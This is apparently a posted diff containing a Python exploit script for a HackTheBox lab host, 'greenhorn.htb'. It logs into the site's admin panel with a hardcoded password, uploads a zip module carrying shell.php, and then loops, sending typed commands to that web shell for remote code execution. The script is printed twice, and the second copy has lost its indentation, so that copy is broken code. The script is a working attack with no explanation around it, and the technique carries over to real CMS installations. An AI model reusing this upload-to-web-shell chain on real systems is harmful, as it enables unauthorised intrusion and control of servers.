sharpicx · September 4, 2024 07:04
diff --git a/a.py b/a.py
 import requests
 import readline
 from requests_toolbelt.multipart.encoder import MultipartEncoder

 def print_colored(text, color_code):
    print(f"\033[{color_code}m{text}\033[0m")

 def upload():
    login_url = "http://greenhorn.htb/login.php"
    upload_url = "http://greenhorn.htb/admin.php?action=installmodule"
    headers = {"Referer": login_url,}
    login_payload = {"cont1": "iloveyou1","admin": "","submit": "Log in"}

    multipart_data = MultipartEncoder(
        fields={
            "sendfile": ("payload.zip", open('a.zip', "rb"), "application/zip"),
            "submit": "Upload"
        }
    )

    session = requests.Session()
    login_response = session.post(login_url, headers=headers, data=login_payload)

    if login_response.status_code == 200:
        upload_headers = {
            "Referer": upload_url,
            "Content-Type": multipart_data.content_type
        }
        upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)

        if upload_response.status_code == 200:
            return True
        else:
            print("[!] ZIP file download error. Response code:", upload_response.status_code)
    else:
        print("[!] Login problem. response code:", login_response.status_code)

 if __name__ == '__main__':
    while True:
        user_input = input("\033[94mΓ¥» \033[0m")
        upload()
        rce_url="http://greenhorn.htb/data/modules/payload/shell.php"
        data = {
            "0": user_input
        }
        rce = requests.post(f"{rce_url}", data=data)
        print(rce.text)
        if user_input.lower() == 'exit':
            print("Exiting...")
            break
	import requests
	import readline
	from requests_toolbelt.multipart.encoder import MultipartEncoder

	def print_colored(text, color_code):
	print(f"\033[{color_code}m{text}\033[0m")

	def upload():
	login_url = "http://greenhorn.htb/login.php"
	upload_url = "http://greenhorn.htb/admin.php?action=installmodule"
	headers = {"Referer": login_url,}
	login_payload = {"cont1": "iloveyou1","admin": "","submit": "Log in"}

	multipart_data = MultipartEncoder(
	fields={
	"sendfile": ("payload.zip", open('a.zip', "rb"), "application/zip"),
	"submit": "Upload"
	}
	)

	session = requests.Session()
	login_response = session.post(login_url, headers=headers, data=login_payload)

	if login_response.status_code == 200:
	upload_headers = {
	"Referer": upload_url,
	"Content-Type": multipart_data.content_type
	}
	upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)

	if upload_response.status_code == 200:
	return True
	else:
	print("[!] ZIP file download error. Response code:", upload_response.status_code)
	else:
	print("[!] Login problem. response code:", login_response.status_code)

	if __name__ == '__main__':
	while True:
	user_input = input("\033[94mΓ¥» \033[0m")
	upload()
	rce_url="http://greenhorn.htb/data/modules/payload/shell.php"
	data = {
	"0": user_input
	}
	rce = requests.post(f"{rce_url}", data=data)
	print(rce.text)
	if user_input.lower() == 'exit':
	print("Exiting...")
	break